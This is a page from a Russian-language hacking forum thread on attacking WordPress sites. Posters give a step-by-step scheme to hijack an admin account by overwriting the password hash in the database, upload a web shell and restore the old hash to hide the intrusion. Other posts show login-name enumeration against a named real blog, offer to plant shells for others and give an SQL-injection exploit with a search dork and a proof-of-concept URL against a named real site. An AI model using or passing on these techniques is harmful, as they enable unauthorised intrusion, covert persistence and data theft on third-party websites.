HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #241  
Старый 06.08.2012, 21:56
cat1vo
Новичок
Регистрация: 12.08.2009
Сообщений: 1
Провел на форуме:
11937

Репутация: 0
По умолчанию

1.Расшифровать пароль!

2.????

3.PROFIT!!!11

Иных вариантов нет исходя из ваших данных. Можете протроянить админа и узнать пароль, не прибегая к расшифровке!
 
Ответить с цитированием

  #242  
Старый 07.08.2012, 12:33
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033

Репутация: 8
По умолчанию

Цитата:
Сообщение от WendM  
WendM said:
Как можно зайти под админом\залить шел, если
1)Есть доступ к бд = есть логи и пасс(мд5) админа
2)Версия движка 2.5.1
3)Секрет кей не дефолтный
Спасибо заранее


Моя бы схема выглядела так:

1) Есть доступ в бд, но нет расшифрованного пасса? Нет проблем!

Заходим в БД. Пишем запрос

Код:
Code:
select password from users where id=1
Запоминаем/записываем хэшик.

Далее запрашиваем

Код:
Code:
update users set password='NewPassword' where id=1
NewPassword можно взять из любых расшифрованных ВордПресс хэшей. Например в этом сообщении

2) Проверяем, что у нашего юзверя сменился хэшик в БД.

3) site/wp-login.php - логин мы знаем, пасс расшифрованный тоже. Спасибо ВП что ещё соль не надо апдейтить (хотя это +1 запрос к бд, не новички смогут и 1 запросом апдейт сделать)

4) Так как мы внутри - льём шелл, например так

5) Из-под шелла или ещё где цепляемся в бд и делаем запрос

Код:
Code:
update users set password='OldPassword' where id=1
Где OldPassword = старый, сохранённый хэшик.


З.Ы. Прикольно жёлтый цвет на мрачном фоне смотрится =)
 
Ответить с цитированием

  #243  
Старый 07.08.2012, 21:18
WendM
Guest
Сообщений: n/a
Провел на форуме:
11466

Репутация: 3
По умолчанию

Цитата:
Сообщение от BigBear  
BigBear said:


Далее запрашиваем

Код:
Code:
update users set password='NewPassword' where id=1

не лезит)
 
Ответить с цитированием

  #244  
Старый 09.08.2012, 16:55
2nikola
Guest
Сообщений: n/a
Провел на форуме:
631

Репутация: 0
По умолчанию

WendM напиши в личку логин и хеш залью шелл
 
Ответить с цитированием

  #245  
Старый 13.08.2012, 15:50
VY_CMa
Guest
Сообщений: n/a
Провел на форуме:
193811

Репутация: 724
По умолчанию

Помошник брута

Дело в том что, чем дальше я влажу в ядро движка, тем больше радуюсь тому, что билдеры как-будто специально оставляют нам шансы на проникновение. Сегодня обратил внимание на wp-login.php

Дело в том, что WP позволяет отображать ник, как того пожелает сам автор, отнюдь, не всегда админ использует логин "admin". Довольно часто приходится брутить... Но как же брутить, если мы не знаем логин админа? В этом нам помогает движок. Дело в том, что скрипт сам помогает нам найти логин админа с помощью того же брута. Возьмем случайны блог и гугла.

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//domashenko.ru/wp-login.php[/COLOR][/COLOR] 
Введем в качестве логина "superuser", а в качестве пасса "123". На что получим подсказку, что юзера с ником "superuser" в базе нет....



Введем логин "admin" и пароль к примеру "test", в результате получаем:



Конечно не новшество, но мне частенько пригождается.
 
Ответить с цитированием

  #246  
Старый 14.08.2012, 22:04
Asin
Guest
Сообщений: n/a
Провел на форуме:
1207

Репутация: 0
По умолчанию

Цитата:
Сообщение от VY_CMa  
VY_CMa said:
Сегодня обратил внимание на wp-login.php
пригождается.
Один из первых шагов по безопасности Wordpress смена страницы входа в админку - wp-login.php
 
Ответить с цитированием

  #247  
Старый 16.08.2012, 12:28
Planet85
Guest
Сообщений: n/a
Провел на форуме:
317

Репутация: 0
По умолчанию

Подскажите пожалуйста, как использовать полученные при помощи программы WP_Cracker логин и хэш? чтобы редактировать сайт
 
Ответить с цитированием

  #248  
Старый 16.08.2012, 20:51
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033

Репутация: 8
По умолчанию

Цитата:
Сообщение от Planet85  
Planet85 said:
Подскажите пожалуйста, как использовать полученные при помощи программы WP_Cracker логин и хэш? чтобы редактировать сайт
Как создатель софтины - советую прочитать отдельную тему по ней тут
 
Ответить с цитированием

  #249  
Старый 05.09.2012, 00:44
tvano0
Guest
Сообщений: n/a
Провел на форуме:
0

Репутация: 0
По умолчанию

вопрос, есть админка, темы и плагины нельзя с неё редактировать.

какие еще методы есть чтоб залить шел? вп 3.4.1
 
Ответить с цитированием

  #250  
Старый 02.10.2012, 03:20
z0mbyak
Познающий
Регистрация: 10.04.2010
Сообщений: 49
Провел на форуме:
168709

Репутация: 1
По умолчанию

fs real estate plugin SQL-Inj

# Exploit Title: fs real estate plugin SQL-Inj

# Date: Oct 2, 2012

#Exploit Author: z0mbyak

# Vendor Homepage: find by yourself

# Software Link: find by yourself

# Version: don't know

# Tested in: web

# Dork: inurl:"marker_listings.xml?id"

# Exploit: -2+union+select+version(),2,3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 ,30,31--

# PoC:

http://themacnabs.com/wp-content/plugins/fs-real-estate-plugin/xml/marker_listings.xml?id=-2+union+select+version(),2,3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 ,30,31--

P.S. Кол-во колонок может отличаться...

P.P.S. Мб, боян, по wp не работаю)
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обзор уязвимостей CMS [Joomla,Mambo] и их компонентов it's my Веб-уязвимости 361 24.10.2019 10:25
[ Обзор уязвимостей PHP-Nuke ] [53x]Shadow Веб-уязвимости 43 04.02.2012 20:33
[ Обзор уязвимостей SLAED CMS ] _kREveDKo_ Веб-уязвимости 20 01.11.2009 14:28
ОБЗОР УЯЗВИМОСТЕЙ БЕСПЛАТНЫХ ПОЧТОВЫХ СЕРВИСОВ nike57 Уязвимости Mail-сервис 4 05.05.2006 22:03
Статья обзор уязвимостей бесплатных почтовых сервисов markel Уязвимости Mail-сервис 3 12.09.2005 10:07



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ